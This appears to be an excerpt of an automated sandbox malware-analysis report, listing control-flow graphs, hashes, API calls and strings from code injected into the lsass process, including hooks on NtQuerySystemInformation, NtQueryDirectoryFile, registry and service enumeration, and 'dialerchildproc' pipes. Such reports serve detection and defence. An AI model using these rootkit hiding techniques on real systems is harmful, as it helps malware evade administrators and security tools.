                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: cc08532799486a9145d1f56adcd321ce6c85642cf947c6a54071b239b4e24e0e
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: EA311E3538A68191FA509F7AE9C3BDF92A6BB44FC2F1460219E19C7796EF24C8528350

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 229 1cb338b2908-1cb338b2973 call 1cb338b0f34 * 4 238 1cb338b2979-1cb338b297c 229->238 239 1cb338b2b8b 229->239 238->239 241 1cb338b2982-1cb338b2985 238->241 240 1cb338b2b8d-1cb338b2ba9 239->240 241->239 242 1cb338b298b-1cb338b298e 241->242 242->239 243 1cb338b2994-1cb338b29b2 242->243 243->239 245 1cb338b29b8-1cb338b29dc call 1cb338b0d6c 243->245 248 1cb338b29de-1cb338b2a09 call 1cb338b0d6c 245->248 249 1cb338b2a0b-1cb338b2a12 245->249 248->249 251 1cb338b2a18-1cb338b2a25 249->251 252 1cb338b2ab2-1cb338b2ab9 249->252 251->252 256 1cb338b2a2b-1cb338b2a39 LoadLibraryA 251->256 253 1cb338b2b6c-1cb338b2b89 252->253 254 1cb338b2abf-1cb338b2ad6 252->254 253->240 254->253 257 1cb338b2adc 254->257 258 1cb338b2a9d-1cb338b2aa5 256->258 259 1cb338b2a3b-1cb338b2a45 256->259 262 1cb338b2ae2-1cb338b2af7 257->262 258->256 260 1cb338b2aa7-1cb338b2aac 258->260 263 1cb338b2a48-1cb338b2a4c 259->263 260->252 264 1cb338b2af9-1cb338b2b0a 262->264 265 1cb338b2b5b-1cb338b2b66 262->265 266 1cb338b2a9a 263->266 267 1cb338b2a4e-1cb338b2a52 263->267 269 1cb338b2b15-1cb338b2b19 264->269 270 1cb338b2b0c-1cb338b2b13 264->270 265->253 265->262 266->258 271 1cb338b2a54-1cb338b2a7b 267->271 272 1cb338b2a7d-1cb338b2a87 267->272 274 1cb338b2b24-1cb338b2b28 269->274 275 1cb338b2b1b-1cb338b2b22 269->275 273 1cb338b2b48-1cb338b2b59 270->273 276 1cb338b2a8d-1cb338b2a98 271->276 272->276 273->264 273->265 277 1cb338b2b3a-1cb338b2b3e 274->277 278 1cb338b2b2a-1cb338b2b38 274->278 275->273 276->263 277->273 279 1cb338b2b40-1cb338b2b43 277->279 278->273 279->273
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: 65e2e66d8a599a2f6f3418f292e571a5bbeb9f775a3ff3744c9a0b0a5d006b2b
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: 7461FD7274A692C3FA68CF159481BAAB391FB04F95F54A121DE1987785DF3CE853C700

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 324 1cb338e2cdc-1cb338e2d55 call 1cb338fecc0 327 1cb338e3090-1cb338e30b3 324->327 328 1cb338e2d5b-1cb338e2d61 324->328 328->327 329 1cb338e2d67-1cb338e2d6a 328->329 329->327 330 1cb338e2d70-1cb338e2d73 329->330 330->327 331 1cb338e2d79-1cb338e2d89 GetModuleHandleA 330->331 332 1cb338e2d9d 331->332 333 1cb338e2d8b-1cb338e2d9b GetProcAddress 331->333 334 1cb338e2da0-1cb338e2dbe 332->334 333->334 334->327 336 1cb338e2dc4-1cb338e2de3 StrCmpNIW 334->336 336->327 337 1cb338e2de9-1cb338e2ded 336->337 337->327 338 1cb338e2df3-1cb338e2dfd 337->338 338->327 339 1cb338e2e03-1cb338e2e0a 338->339 339->327 340 1cb338e2e10-1cb338e2e23 339->340 341 1cb338e2e25-1cb338e2e31 340->341 342 1cb338e2e33 340->342 343 1cb338e2e36-1cb338e2e3a 341->343 342->343 344 1cb338e2e4a 343->344 345 1cb338e2e3c-1cb338e2e48 343->345 346 1cb338e2e4d-1cb338e2e57 344->346 345->346 347 1cb338e2f4d-1cb338e2f51 346->347 348 1cb338e2e5d-1cb338e2e60 346->348 349 1cb338e2f57-1cb338e2f5a 347->349 350 1cb338e3082-1cb338e308a 347->350 351 1cb338e2e72-1cb338e2e7c 348->351 352 1cb338e2e62-1cb338e2e6f call 1cb338e1a14 348->352 355 1cb338e2f6b-1cb338e2f75 349->355 356 1cb338e2f5c-1cb338e2f68 call 1cb338e1a14 349->356 350->327 350->340 353 1cb338e2eb0-1cb338e2eba 351->353 354 1cb338e2e7e-1cb338e2e8b 351->354 352->351 359 1cb338e2eea-1cb338e2eed 353->359 360 1cb338e2ebc-1cb338e2ec9 353->360 354->353 358 1cb338e2e8d-1cb338e2e9a 354->358 362 1cb338e2f77-1cb338e2f84 355->362 363 1cb338e2fa5-1cb338e2fa8 355->363 356->355 367 1cb338e2e9d-1cb338e2ea3 358->367 369 1cb338e2eef-1cb338e2ef9 call 1cb338e1d28 359->369 370 1cb338e2efb-1cb338e2f08 lstrlenW 359->370 360->359 368 1cb338e2ecb-1cb338e2ed8 360->368 362->363 372 1cb338e2f86-1cb338e2f93 362->372 365 1cb338e2faa-1cb338e2fb3 call 1cb338e1d28 363->365 366 1cb338e2fb5-1cb338e2fc2 lstrlenW 363->366 365->366 391 1cb338e2ffa-1cb338e3005 365->391 376 1cb338e2fe5-1cb338e2fef call 1cb338e3930 366->376 377 1cb338e2fc4-1cb338e2fce 366->377 374 1cb338e2ea9-1cb338e2eae 367->374 375 1cb338e2f43-1cb338e2f48 367->375 378 1cb338e2edb-1cb338e2ee1 368->378 369->370 369->375 380 1cb338e2f0a-1cb338e2f14 370->380 381 1cb338e2f2b-1cb338e2f3d call 1cb338e3930 370->381 382 1cb338e2f96-1cb338e2f9c 372->382 374->353 374->367 385 1cb338e2ff2-1cb338e2ff4 375->385 376->385 377->376 386 1cb338e2fd0-1cb338e2fe3 call 1cb338e1554 377->386 378->375 387 1cb338e2ee3-1cb338e2ee8 378->387 380->381 390 1cb338e2f16-1cb338e2f29 call 1cb338e1554 380->390 381->375 381->385 382->391 392 1cb338e2f9e-1cb338e2fa3 382->392 385->350 385->391 386->376 386->391 387->359 387->378 390->375 390->381 397 1cb338e3007-1cb338e300b 391->397 398 1cb338e307c-1cb338e3080 391->398 392->363 392->382 401 1cb338e3013-1cb338e302d call 1cb338e86a0 397->401 402 1cb338e300d-1cb338e3011 397->402 398->350 403 1cb338e3030-1cb338e3033 401->403 402->401 402->403 406 1cb338e3035-1cb338e3053 call 1cb338e86a0 403->406 407 1cb338e3056-1cb338e3059 403->407 406->407 407->398 409 1cb338e305b-1cb338e3079 call 1cb338e86a0 407->409 409->398
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 7080cbd7cdb41b6b188b0ba784345d16a0fd56170d5fe49ac494bddbe1a3a953
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: EEB1B03225A6D082FB64AF29D482BEB63A4FB44F86F147016EE4993794DF75CD42C340
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: db2fb050424f96b7a9199601d1c11ed81c32f0534f5a22952dd37c89fa393b69
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 52315D7224ABC086FB60DF64E881BEE7360F784B45F44542AEA4D97B98EF78C549C710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: 4b6f165afe4570f181375a65a29c9eb5fceed704b82f303154fd395225176aa5
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: B7314E32259BC086EB60CF29E881BDE73A4F788B55F541116EE9D83B64DF38C5468B00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: 1ef65cd3466385580d4748a0ca8de379aab589802a49e1ea71e93c9745d5d2c9
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: A9E101B2749AC08AF700CF64E481ADE7BB1F385B89F105516DE4A97B99DB39C51BC700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: 36e075336694569a75ef71943ddecc879709bd781ad67cd28ed3c5136645a556
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: 9F519C72249B8493FB10DF66F485B9AB3A1F788F85F049124DE8983B14DF78C196C700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: 213c126a435aa63b6c5c71154e8537b495190c9bbfe7ba31150c4d214ca23b31
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: C231747429B9C6A0FA04EB58F8D3ED62321B744F46F817523AD19923719F3AD24BC750

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: c60ebe29c9fd93d7df74672e157faf9d13bcbfa2099ebdd07f03f9e1a8e8a641
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: DD21713665978083F710DB24F485B9A73A0F389FA5F501215EE9982BA8DF7DC14ACF00

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: 785ddce240ee35d8aa333844c5738ed3f81dbfa3fd993c66eb8213252023e018
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: F9416B37219B8097E7608F66E485B9AB7A1F388B85F009125EF8947B54DF38C1A6CB00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 437 1cb338b69f0-1cb338b69f6 438 1cb338b69f8-1cb338b69fb 437->438 439 1cb338b6a31-1cb338b6a3b 437->439 440 1cb338b6a25-1cb338b6a64 call 1cb338b70a0 438->440 441 1cb338b69fd-1cb338b6a00 438->441 442 1cb338b6b58-1cb338b6b6d 439->442 460 1cb338b6a6a-1cb338b6a7f call 1cb338b6f34 440->460 461 1cb338b6b32 440->461 443 1cb338b6a18 __scrt_dllmain_crt_thread_attach 441->443 444 1cb338b6a02-1cb338b6a05 441->444 445 1cb338b6b7c-1cb338b6b96 call 1cb338b6f34 442->445 446 1cb338b6b6f 442->446 452 1cb338b6a1d-1cb338b6a24 443->452 448 1cb338b6a07-1cb338b6a10 444->448 449 1cb338b6a11-1cb338b6a16 call 1cb338b6fe4 444->449 458 1cb338b6b98-1cb338b6bcd call 1cb338b705c call 1cb338b6efc call 1cb338b73f8 call 1cb338b7210 call 1cb338b7234 call 1cb338b708c 445->458 459 1cb338b6bcf-1cb338b6c00 call 1cb338b7270 445->459 450 1cb338b6b71-1cb338b6b7b 446->450 449->452 458->450 471 1cb338b6c02-1cb338b6c08 459->471 472 1cb338b6c11-1cb338b6c17 459->472 469 1cb338b6a85-1cb338b6a96 call 1cb338b6fa4 460->469 470 1cb338b6b4a-1cb338b6b57 call 1cb338b7270 460->470 464 1cb338b6b34-1cb338b6b49 461->464 487 1cb338b6a98-1cb338b6abc call 1cb338b73bc call 1cb338b6eec call 1cb338b6f18 call 1cb338b90dc 469->487 488 1cb338b6ae7-1cb338b6af1 call 1cb338b7210 469->488 470->442 471->472 476 1cb338b6c0a-1cb338b6c0c 471->476 477 1cb338b6c19-1cb338b6c23 472->477 478 1cb338b6c5e-1cb338b6c74 call 1cb338b2858 472->478 483 1cb338b6cff-1cb338b6d0c 476->483 484 1cb338b6c25-1cb338b6c2d 477->484 485 1cb338b6c2f-1cb338b6c3d call 1cb338c2758 477->485 496 1cb338b6c76-1cb338b6c78 478->496 497 1cb338b6cac-1cb338b6cae 478->497 490 1cb338b6c43-1cb338b6c58 call 1cb338b69f0 484->490 485->490 500 1cb338b6cf5-1cb338b6cfd 485->500 487->488 540 1cb338b6abe-1cb338b6ac5 __scrt_dllmain_after_initialize_c 487->540 488->461 510 1cb338b6af3-1cb338b6aff call 1cb338b7260 488->510 490->478 490->500 496->497 505 1cb338b6c7a-1cb338b6c9c call 1cb338b2858 call 1cb338b6b58 496->505 506 1cb338b6cb5-1cb338b6cca call 1cb338b69f0 497->506 507 1cb338b6cb0-1cb338b6cb3 497->507 500->483 505->497 534 1cb338b6c9e-1cb338b6ca6 call 1cb338c2758 505->534 506->500 520 1cb338b6ccc-1cb338b6cd6 506->520 507->500 507->506 527 1cb338b6b25-1cb338b6b30 510->527 528 1cb338b6b01-1cb338b6b0b call 1cb338b7178 510->528 525 1cb338b6cd8-1cb338b6cdf 520->525 526 1cb338b6ce1-1cb338b6cf1 call 1cb338c2758 520->526 525->500 526->500 527->464 528->527 539 1cb338b6b0d-1cb338b6b1b 528->539 534->497 539->527 540->488 541 1cb338b6ac7-1cb338b6ae4 call 1cb338b9078 540->541 541->488
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 8fb5fe4f90fc1c8ca4ac30091efbecba73b510cfb20943e81bb99ff710942c38
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: A4816B3168A6C386FE54AF2594D3BDB66A0BB45F82F586025AE45C37D6DF3CC8478700

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 544 1cb338e75f0-1cb338e75f6 545 1cb338e75f8-1cb338e75fb 544->545 546 1cb338e7631-1cb338e763b 544->546 548 1cb338e7625-1cb338e7664 call 1cb338e7ca0 545->548 549 1cb338e75fd-1cb338e7600 545->549 547 1cb338e7758-1cb338e776d 546->547 553 1cb338e776f 547->553 554 1cb338e777c-1cb338e7796 call 1cb338e7b34 547->554 567 1cb338e766a-1cb338e767f call 1cb338e7b34 548->567 568 1cb338e7732 548->568 551 1cb338e7618 __scrt_dllmain_crt_thread_attach 549->551 552 1cb338e7602-1cb338e7605 549->552 557 1cb338e761d-1cb338e7624 551->557 559 1cb338e7607-1cb338e7610 552->559 560 1cb338e7611-1cb338e7616 call 1cb338e7be4 552->560 555 1cb338e7771-1cb338e777b 553->555 565 1cb338e7798-1cb338e77cd call 1cb338e7c5c call 1cb338e7afc call 1cb338e7ff8 call 1cb338e7e10 call 1cb338e7e34 call 1cb338e7c8c 554->565 566 1cb338e77cf-1cb338e7800 call 1cb338e7e70 554->566 560->557 565->555 576 1cb338e7811-1cb338e7817 566->576 577 1cb338e7802-1cb338e7808 566->577 579 1cb338e774a-1cb338e7757 call 1cb338e7e70 567->579 580 1cb338e7685-1cb338e7696 call 1cb338e7ba4 567->580 571 1cb338e7734-1cb338e7749 568->571 582 1cb338e7819-1cb338e7823 576->582 583 1cb338e785e-1cb338e7874 call 1cb338e3458 576->583 577->576 581 1cb338e780a-1cb338e780c 577->581 579->547 594 1cb338e76e7-1cb338e76f1 call 1cb338e7e10 580->594 595 1cb338e7698-1cb338e76bc call 1cb338e7fbc call 1cb338e7aec call 1cb338e7b18 call 1cb338e9cdc 580->595 588 1cb338e78ff-1cb338e790c 581->588 589 1cb338e7825-1cb338e782d 582->589 590 1cb338e782f-1cb338e783d call 1cb338f3358 582->590 601 1cb338e7876-1cb338e7878 583->601 602 1cb338e78ac-1cb338e78ae 583->602 597 1cb338e7843-1cb338e7858 call 1cb338e75f0 589->597 590->597 611 1cb338e78f5-1cb338e78fd 590->611 594->568 615 1cb338e76f3-1cb338e76ff call 1cb338e7e60 594->615 595->594 647 1cb338e76be-1cb338e76c5 __scrt_dllmain_after_initialize_c 595->647 597->583 597->611 601->602 608 1cb338e787a-1cb338e789c call 1cb338e3458 call 1cb338e7758 601->608 609 1cb338e78b5-1cb338e78ca call 1cb338e75f0 602->609 610 1cb338e78b0-1cb338e78b3 602->610 608->602 641 1cb338e789e-1cb338e78a6 call 1cb338f3358 608->641 609->611 629 1cb338e78cc-1cb338e78d6 609->629 610->609 610->611 611->588 634 1cb338e7725-1cb338e7730 615->634 635 1cb338e7701-1cb338e770b call 1cb338e7d78 615->635 631 1cb338e78d8-1cb338e78df 629->631 632 1cb338e78e1-1cb338e78f1 call 1cb338f3358 629->632 631->611 632->611 634->571 635->634 646 1cb338e770d-1cb338e771b 635->646 641->602 646->634 647->594 648 1cb338e76c7-1cb338e76e4 call 1cb338e9c78 647->648 648->594
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 67587e8b952d1c31c95f19347dec945bf7c5bd067aa821d5634c45eb90ecfa6a
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 2E81D13178E2C186FA54AB2DA8C3FEB2290B795F86F186115BE04C7796DB79C8479700

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 651 1cb338e9804-1cb338e9842 652 1cb338e9848-1cb338e984b 651->652 653 1cb338e9933 651->653 654 1cb338e9935-1cb338e9951 652->654 655 1cb338e9851 652->655 653->654 656 1cb338e9854 655->656 657 1cb338e985a-1cb338e9869 656->657 658 1cb338e992b 656->658 659 1cb338e9876-1cb338e9895 LoadLibraryExW 657->659 660 1cb338e986b-1cb338e986e 657->660 658->653 663 1cb338e9897-1cb338e98a0 call 1cb338f3080 659->663 664 1cb338e98ed-1cb338e9902 659->664 661 1cb338e9874 660->661 662 1cb338e990d-1cb338e991c GetProcAddress 660->662 667 1cb338e98e1-1cb338e98e8 661->667 662->658 666 1cb338e991e-1cb338e9929 662->666 670 1cb338e98a2-1cb338e98b7 call 1cb338ead28 663->670 671 1cb338e98cf-1cb338e98d9 663->671 664->662 665 1cb338e9904-1cb338e9907 FreeLibrary 664->665 665->662 666->654 667->656 670->671 674 1cb338e98b9-1cb338e98cd LoadLibraryExW 670->674 671->667 674->664 674->671
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: 7064061b1e11c6b6a030ee932abb8ec174108f6bb197159b8198950ebab4d349
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 4431A43125BBD091FE11EB1AA882BDA6394B749FA2F192525EDAD87390DF7CC5478300
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 06f5cd298027907d268e6a23d83f6d13434a2f91efbd27422d4e2b0134eabb13
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: E511BF31359B8086F7508B42F886B9A72A0F388FE6F001225EE9DC7794DF7AC9568744
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: fc01d6510520cdca5c77511656d7b2b35d9c48517a6ed435d2e08176a8bc06c2
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: 7BD19E3624EB8885EA709B19E49579B77A0F388F89F101216EE8D87B65DF3DC542CB04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: 6f891014f539c58fb6a9608bde0db0f482793eb2bf0660cd485ff7db75ca2f0a
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 7E31CA3534AB9192F715DF5AE881BEB63A0FB44F86F046024AE4887754EF78C8A3C700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 5d7736df629fdb04a580366088fbeff1d6a4fd7bf9e656a60f8bb3e257dfe36f
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: 89018031349A8196FB10DB12F499BAA63A1F788FC2F584035DE8983754DF7DC986C300
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 1f77551ad27cf53e1b2a265746e6af4cadf7dd493f4a1b8be14ce60691139c27
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: E5112D7565A7C083FB249B25F48AF9B67A0BB88F82F042425DD4987764EF7EC44AC700
                                                APIs
                                                Strings
                                                Memory Dump Source
